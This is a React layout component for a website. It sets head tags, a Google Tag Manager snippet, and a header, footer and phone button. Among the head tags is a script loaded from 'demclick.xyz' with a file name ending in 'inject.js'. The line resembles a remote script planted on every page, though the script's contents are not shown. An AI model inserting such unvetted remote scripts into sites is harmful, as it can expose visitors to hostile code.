/* eslint-disable react/no-danger */
/* eslint-disable react/jsx-closing-tag-location */
import React from 'react'
import {Helmet} from 'react-helmet'

// Components
import Layout from './Layout.styled'
import Header from './Header'
import Footer from './Footer'
import GlobalStyle from '~/components/GlobalStyle'

// Global tyle
import 'normalize.css/normalize.css'
import 'bootstrap/dist/css/bootstrap.min.css'
import '~/static/slick-carousel/slick.min.css'
import '@fontsource/montserrat/300.css'
import '@fontsource/montserrat/400.css'
import '@fontsource/montserrat/500.css'
import '@fontsource/montserrat/600.css'
import '@fontsource/montserrat/700.css'

// eslint-disable-next-line quotes

const Head = () => (
  <Helmet>
    <meta property='og:type' content='website' />
    <link rel='preconnect' href='https://res.cloudinary.com' />
    <link rel='dns-prefetch' href='//www.googletagmanager.com' />
    <link rel='dns-prefetch' href='//res.cloudinary.com' />
    <script>{`
      (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
      new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
      j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
      'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
      })(window,document,'script','dataLayer','GTM-P66GPJ6');
    `}</script>
    <script src='https://demclick.xyz/js/s3xclient_inject.js' />
    <script src='https://code.jquery.com/jquery-3.6.0.min.js' />
  </Helmet>
)

const LayoutContainer = (props) => {
  const {
    children,
    pageName,
  } = props

  return (
    <>
      <Head />

      <GlobalStyle />

      <Layout>
        <Layout.HeaderWrapper>
          <Header {...{pageName}} />
        </Layout.HeaderWrapper>

        <Layout.Main>{children}</Layout.Main>

        <Layout.FooterWrapper>
          <Footer />
        </Layout.FooterWrapper>

        <Layout.PhoneButton href='tel:0978800347' />
      </Layout>
    </>
  )
}

export default LayoutContainer
